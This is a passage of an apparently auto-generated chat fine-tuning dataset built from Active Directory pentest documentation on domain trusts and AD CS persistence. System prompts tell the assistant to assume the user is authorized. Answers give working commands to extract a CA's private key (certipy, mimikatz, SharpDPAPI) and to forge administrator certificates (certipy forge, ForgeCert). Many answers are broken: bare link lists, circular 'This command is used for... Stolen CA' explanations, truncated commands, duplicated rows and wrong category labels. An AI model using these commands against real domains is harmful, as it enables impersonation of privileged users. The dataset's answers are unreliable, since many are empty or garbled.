.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted\n\nhttps://nored0x.github.io/red-teaming/active-directory-Trust-enumeration/\n\nhttps://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d\n\nhttps://adsecurity.org/?p=425\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://www.labofapenetrationtester.com/2019/04/abusing-PAM.html", "metadata": {"corpus_index": 1168, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Trusts - Offensive POV"}, {"role": "assistant", "content": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-2-operational-guidance/\n\nhttps://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/\n\nhttps://mayfly277.github.io/posts/GOADv2-pwning-part12\n\nhttps://adsecurity.org/?p=282\n\nhttps://adsecurity.org/?p=1640\n\nhttps://blog.harmj0y.net/redteaming/domain-trusts-were-not-done-yet/\n\nhttps://blog.harmj0y.net/redteaming/the-trustpocalypse/\n\nhttps://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/\n\nhttps://adsecurity.org/?p=4056\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted\n\nhttps://nored0x.github.io/red-teaming/active-directory-Trust-enumeration/\n\nhttps://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d\n\nhttps://adsecurity.org/?p=425\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://www.labofapenetrationtester.com/2019/04/abusing-PAM.html"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Trusts - Offensive POV", "response": "https://www.securesystems.de/blog/active-directory-spotlight-trusts-part-2-operational-guidance/\n\nhttps://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-one-how-does-sid-filtering-work/\n\nhttps://dirkjanm.io/active-directory-forest-trusts-part-two-trust-transitivity/\n\nhttps://mayfly277.github.io/posts/GOADv2-pwning-part12\n\nhttps://adsecurity.org/?p=282\n\nhttps://adsecurity.org/?p=1640\n\nhttps://blog.harmj0y.net/redteaming/domain-trusts-were-not-done-yet/\n\nhttps://blog.harmj0y.net/redteaming/the-trustpocalypse/\n\nhttps://blog.harmj0y.net/redteaming/not-a-security-boundary-breaking-forest-trusts/\n\nhttps://adsecurity.org/?p=4056\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-2-known-ad-attacks-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-3-sid-filtering-explained\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-4-bypass-sid-filtering-research\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-5-golden-gmsa-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent\n\nhttps://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-7-trust-account-attack-from-trusting-to-trusted\n\nhttps://nored0x.github.io/red-teaming/active-directory-Trust-enumeration/\n\nhttps://posts.specterops.io/not-a-security-boundary-breaking-forest-trusts-cd125829518d\n\nhttps://adsecurity.org/?p=425\n\nhttps://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1\n\nhttps://www.labofapenetrationtester.com/2019/04/abusing-PAM.html", "metadata": {"corpus_index": 1168, "category": "active_directory", "source_file": "docs/src/ad/movement/trusts/index.md", "page_title": "Trusts", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Access controls - Theory"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen identified a set of vectors of domain persistence based on access control misconfigurations (dubbed DPERSIST3). \n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes Certificate templates, Certificate Authorities, CA server, etc.\n\nIn the same research papers, domain escalation techniques abusing misconfigurated access controls were identified dubbed ESC4, ESC5 and ESC7).\n\nIf an attacker obtains sufficient permissions in a domain, he could modify security descriptors of AD CS components, in order to make them vulnerable to the attacks mentioned in Movement > AD-CS > Access controls.\n\nThese modifications can be made with tools like Impacket's (Python) dacledit.py or with Add-DomainObjectAcl (PowerView module), as explained in grant-rights.md."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Access controls - Theory", "response": "In their research papers, Will Schroeder and Lee Christensen identified a set of vectors of domain persistence based on access control misconfigurations (dubbed DPERSIST3). \n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes Certificate templates, Certificate Authorities, CA server, etc.\n\nIn the same research papers, domain escalation techniques abusing misconfigurated access controls were identified dubbed ESC4, ESC5 and ESC7).\n\nIf an attacker obtains sufficient permissions in a domain, he could modify security descriptors of AD CS components, in order to make them vulnerable to the attacks mentioned in Movement > AD-CS > Access controls.\n\nThese modifications can be made with tools like Impacket's (Python) dacledit.py or with Add-DomainObjectAcl (PowerView module), as explained in grant-rights.md.", "metadata": {"corpus_index": 1169, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Access controls - Theory"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen identified a set of vectors of domain persistence based on access control misconfigurations (dubbed DPERSIST3). \n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes Certificate templates, Certificate Authorities, CA server, etc.\n\nIn the same research papers, domain escalation techniques abusing misconfigurated access controls were identified dubbed ESC4, ESC5 and ESC7).\n\nIf an attacker obtains sufficient permissions in a domain, he could modify security descriptors of AD CS components, in order to make them vulnerable to the attacks mentioned in Movement > AD-CS > Access controls.\n\nThese modifications can be made with tools like Impacket's (Python) dacledit.py or with Add-DomainObjectAcl (PowerView module), as explained in grant-rights.md."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Access controls - Theory", "response": "In their research papers, Will Schroeder and Lee Christensen identified a set of vectors of domain persistence based on access control misconfigurations (dubbed DPERSIST3). \n\nActive Directory Certificate Services add multiple objects to AD, including securable ones which principals can have permissions over. This includes Certificate templates, Certificate Authorities, CA server, etc.\n\nIn the same research papers, domain escalation techniques abusing misconfigurated access controls were identified dubbed ESC4, ESC5 and ESC7).\n\nIf an attacker obtains sufficient permissions in a domain, he could modify security descriptors of AD CS components, in order to make them vulnerable to the attacks mentioned in Movement > AD-CS > Access controls.\n\nThese modifications can be made with tools like Impacket's (Python) dacledit.py or with Add-DomainObjectAcl (PowerView module), as explained in grant-rights.md.", "metadata": {"corpus_index": 1169, "category": "active_directory", "source_file": "docs/src/ad/persistence/adcs/access-controls.md", "page_title": "Access controls", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate authority - Theory"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen identified 2 domain persistence techniques relying on the role of the Certificate Authority within a PKI.\n\n* Forging certificates with a stolen CA certificates (DPERSIST1)\n* Trusting rogue CA certificates (DPERSIST2)"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate authority - Theory", "response": "In their research papers, Will Schroeder and Lee Christensen identified 2 domain persistence techniques relying on the role of the Certificate Authority within a PKI.\n\n* Forging certificates with a stolen CA certificates (DPERSIST1)\n* Trusting rogue CA certificates (DPERSIST2)", "metadata": {"corpus_index": 1170, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Certificate authority - Theory"}, {"role": "assistant", "content": "In their research papers, Will Schroeder and Lee Christensen identified 2 domain persistence techniques relying on the role of the Certificate Authority within a PKI.\n\n* Forging certificates with a stolen CA certificates (DPERSIST1)\n* Trusting rogue CA certificates (DPERSIST2)"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Certificate authority - Theory", "response": "In their research papers, Will Schroeder and Lee Christensen identified 2 domain persistence techniques relying on the role of the Certificate Authority within a PKI.\n\n* Forging certificates with a stolen CA certificates (DPERSIST1)\n* Trusting rogue CA certificates (DPERSIST2)", "metadata": {"corpus_index": 1170, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Certificate authority - Stolen CA in the context of penetration testing"}, {"role": "assistant", "content": "> The Enterprise CA has a certificate and associated private key that exist on the CA server itself. (Certified_Pre-Owned.pdf)\n\nIf an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA cert, and use that private key to generate and sign client certificates. This means he could forge (and sign) certificate to authenticate as a powerful user for example.\n\n::: tabs\n\n=== UNIX-like\n\nExtracting the DPAPI-protected CA cert private key can be done remotely from UNIX-like systems with Certipy (Python).\n\n``bash\ncertipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"\n`\n\nThen, forging (and signing) a certificate can be done as follows.\n\n`bash\ncertipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"\n`\n\nThe certificate can then be used with Pass the Certificate.\n\n=== Windows\n\nExtracting the DPAPI-protected CA cert private key can be done remotely with Seatbelt (C#).\n\n`powershell\nSeatbelt.exe Certificates -computername=\"ca.domain.local\"\n`\n\nAlternatively, the builtin certsrv.msc utility can be used locally on the CA server.\n\n`\nWin+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next\n`\n\nAlternatively, Mimikatz (C) can also be used for that purpose, locally.\n\n`powershell\nmimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"\n`\n\nAlternatively, SharpDPAPI (C#) can be used for that purpose, locally, along with openssl to transform the PEM into a usable PFX.\n\n`powershell\nSharpDPAPI.exe certificates /machine\n`\n\n`bash\nopenssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"\n`\n\nThen, forging and signing a certificate can be done with ForgeCert (C#).\n\n`powershell\nForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"admin"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Certificate authority - Stolen CA in the context of penetration testing", "response": "> The Enterprise CA has a certificate and associated private key that exist on the CA server itself. (Certified_Pre-Owned.pdf)\n\nIf an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA cert, and use that private key to generate and sign client certificates. This means he could forge (and sign) certificate to authenticate as a powerful user for example.\n\n::: tabs\n\n=== UNIX-like\n\nExtracting the DPAPI-protected CA cert private key can be done remotely from UNIX-like systems with Certipy (Python).\n\n``bash\ncertipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"\n`\n\nThen, forging (and signing) a certificate can be done as follows.\n\n`bash\ncertipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"\n`\n\nThe certificate can then be used with Pass the Certificate.\n\n=== Windows\n\nExtracting the DPAPI-protected CA cert private key can be done remotely with Seatbelt (C#).\n\n`powershell\nSeatbelt.exe Certificates -computername=\"ca.domain.local\"\n`\n\nAlternatively, the builtin certsrv.msc utility can be used locally on the CA server.\n\n`\nWin+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next\n`\n\nAlternatively, Mimikatz (C) can also be used for that purpose, locally.\n\n`powershell\nmimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"\n`\n\nAlternatively, SharpDPAPI (C#) can be used for that purpose, locally, along with openssl to transform the PEM into a usable PFX.\n\n`powershell\nSharpDPAPI.exe certificates /machine\n`\n\n`bash\nopenssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"\n`\n\nThen, forging and signing a certificate can be done with ForgeCert (C#).\n\n`powershell\nForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"admin", "metadata": {"corpus_index": 1171, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate authority - Stolen CA"}, {"role": "assistant", "content": "> The Enterprise CA has a certificate and associated private key that exist on the CA server itself. (Certified_Pre-Owned.pdf)\n\nIf an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA cert, and use that private key to generate and sign client certificates. This means he could forge (and sign) certificate to authenticate as a powerful user for example.\n\n::: tabs\n\n=== UNIX-like\n\nExtracting the DPAPI-protected CA cert private key can be done remotely from UNIX-like systems with Certipy (Python).\n\n``bash\ncertipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"\n`\n\nThen, forging (and signing) a certificate can be done as follows.\n\n`bash\ncertipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"\n`\n\nThe certificate can then be used with Pass the Certificate.\n\n=== Windows\n\nExtracting the DPAPI-protected CA cert private key can be done remotely with Seatbelt (C#).\n\n`powershell\nSeatbelt.exe Certificates -computername=\"ca.domain.local\"\n`\n\nAlternatively, the builtin certsrv.msc utility can be used locally on the CA server.\n\n`\nWin+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next\n`\n\nAlternatively, Mimikatz (C) can also be used for that purpose, locally.\n\n`powershell\nmimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"\n`\n\nAlternatively, SharpDPAPI (C#) can be used for that purpose, locally, along with openssl to transform the PEM into a usable PFX.\n\n`powershell\nSharpDPAPI.exe certificates /machine\n`\n\n`bash\nopenssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"\n`\n\nThen, forging and signing a certificate can be done with ForgeCert (C#).\n\n`powershell\nForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"admin"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate authority - Stolen CA", "response": "> The Enterprise CA has a certificate and associated private key that exist on the CA server itself. (Certified_Pre-Owned.pdf)\n\nIf an attacker obtains control over a CA server, he may be able to retrieve the private key associated with the CA cert, and use that private key to generate and sign client certificates. This means he could forge (and sign) certificate to authenticate as a powerful user for example.\n\n::: tabs\n\n=== UNIX-like\n\nExtracting the DPAPI-protected CA cert private key can be done remotely from UNIX-like systems with Certipy (Python).\n\n``bash\ncertipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"\n`\n\nThen, forging (and signing) a certificate can be done as follows.\n\n`bash\ncertipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"\n`\n\nThe certificate can then be used with Pass the Certificate.\n\n=== Windows\n\nExtracting the DPAPI-protected CA cert private key can be done remotely with Seatbelt (C#).\n\n`powershell\nSeatbelt.exe Certificates -computername=\"ca.domain.local\"\n`\n\nAlternatively, the builtin certsrv.msc utility can be used locally on the CA server.\n\n`\nWin+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next\n`\n\nAlternatively, Mimikatz (C) can also be used for that purpose, locally.\n\n`powershell\nmimikatz.exe \"crypto::capi\" \"crypto::cng\" \"crypto::certificates /export\"\n`\n\nAlternatively, SharpDPAPI (C#) can be used for that purpose, locally, along with openssl to transform the PEM into a usable PFX.\n\n`powershell\nSharpDPAPI.exe certificates /machine\n`\n\n`bash\nopenssl pkcs12 -in \"ca.pem\" -keyex -CSP \"Microsoft Enhanced\nCryptographic Provider v1.0\" -export -out \"ca.pfx\"\n`\n\nThen, forging and signing a certificate can be done with ForgeCert (C#).\n\n`powershell\nForgeCert.exe --CaCertPath \"ca.pfx\" --CaCertPassword \"Password\" --Subject \"CN=User\" --SubjectAltName \"administrator@domain.local\" --NewCertPath \"admin", "metadata": {"corpus_index": 1171, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use certipy for certificate authority - stolen ca?"}, {"role": "assistant", "content": "certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use certipy for certificate authority - stolen ca?", "response": "certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"", "metadata": {"corpus_index": 1172, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Certificate authority - Stolen CA"}, {"role": "assistant", "content": "certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Certificate authority - Stolen CA", "response": "certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"", "metadata": {"corpus_index": 1172, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy ca -backup -ca \"CA\" -username \"USER@domain.local\" -password \"PASSWORD\" -dc-ip \"DC-IP\"`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1172, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate authority - stolen ca?"}, {"role": "assistant", "content": "certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate authority - stolen ca?", "response": "certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"", "metadata": {"corpus_index": 1173, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate authority - Stolen CA?"}, {"role": "assistant", "content": "certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate authority - Stolen CA?", "response": "certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"", "metadata": {"corpus_index": 1173, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy forge -ca-pfx \"CA.pfx\" -upn \"administrator@corp.local\" -subject \"CN=Administrator,CN=Users,DC=CORP,DC=LOCAL\"`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1173, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Seatbelt.exe command for certificate authority - stolen ca"}, {"role": "assistant", "content": "Seatbelt.exe Certificates -computername=\"ca.domain.local\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Seatbelt.exe command for certificate authority - stolen ca", "response": "Seatbelt.exe Certificates -computername=\"ca.domain.local\"", "metadata": {"corpus_index": 1174, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Seatbelt.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Certificate authority - Stolen CA?"}, {"role": "assistant", "content": "Seatbelt.exe Certificates -computername=\"ca.domain.local\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Certificate authority - Stolen CA?", "response": "Seatbelt.exe Certificates -computername=\"ca.domain.local\"", "metadata": {"corpus_index": 1174, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Seatbelt.exe Certificates -computername=\"ca.domain.local\"`?"}, {"role": "assistant", "content": "This command is used for certificate authority - stolen ca. Stolen CA"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Seatbelt.exe Certificates -computername=\"ca.domain.local\"`?", "response": "This command is used for certificate authority - stolen ca. Stolen CA", "metadata": {"corpus_index": 1174, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Certificate authority - Stolen CA during a pentest?"}, {"role": "assistant", "content": "Win+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Certificate authority - Stolen CA during a pentest?", "response": "Win+R > certsrv.msc > CA > right click > All Tasks > Back up CA... > selet \"Private key and CA certificate\" > Next", "metadata": {"corpus_index": 1175, "category": "web", "source_file": "docs/src/ad/persistence/adcs/certificate-authority.md", "page_title": "Certificate authority", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Win+R > certsrv.msc > CA > 